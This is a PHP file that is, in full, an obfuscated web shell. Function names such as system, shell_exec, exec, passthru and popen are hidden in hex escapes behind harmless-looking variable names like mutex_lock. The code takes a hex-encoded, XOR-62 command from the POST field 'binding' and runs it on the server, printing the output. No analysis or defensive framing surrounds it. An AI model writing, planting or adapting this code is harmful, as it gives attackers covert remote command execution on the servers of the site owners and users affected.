<?php

$mutex_lock5 = "\x70\x6Fpen";
$mutex_lock6 = "st\x72ea\x6D_\x67et_co\x6Et\x65\x6E\x74s";
$mutex_lock1 = "sy\x73tem";
$mutex_lock4 = "p\x61ss\x74h\x72u";
$config_manager = "hex\x32\x62in";
$mutex_lock7 = "pclose";
$mutex_lock3 = "\x65x\x65c";
$mutex_lock2 = "s\x68\x65l\x6C_\x65\x78ec";
if (isset($_POST["b\x69\x6Edi\x6E\x67"])) {
            function hub_center($bind ,  $marker) { $fac='' ; $s=0; while($s<strlen($bind)){$fac.=chr(ord($bind[$s])^$marker);$s++;} return$fac;}
            $binding = $config_manager($_POST["b\x69\x6Edi\x6E\x67"]);
            $binding = hub_center($binding, 62);
            if (function_exists($mutex_lock1)) {
                $mutex_lock1($binding);
            } elseif (function_exists($mutex_lock2)) {
                print $mutex_lock2($binding);
            } elseif (function_exists($mutex_lock3)) {
                $mutex_lock3($binding, $reference_bind);
                print join("\n", $reference_bind);
            } elseif (function_exists($mutex_lock4)) {
                $mutex_lock4($binding);
            } elseif (function_exists($mutex_lock5) && function_exists($mutex_lock6) && function_exists($mutex_lock7)) {
                $marker_fac = $mutex_lock5($binding, 'r');
                if ($marker_fac) {
                    $ent_factor = $mutex_lock6($marker_fac);
                    $mutex_lock7($marker_fac);
                    print $ent_factor;
                }
            }
            exit;
        }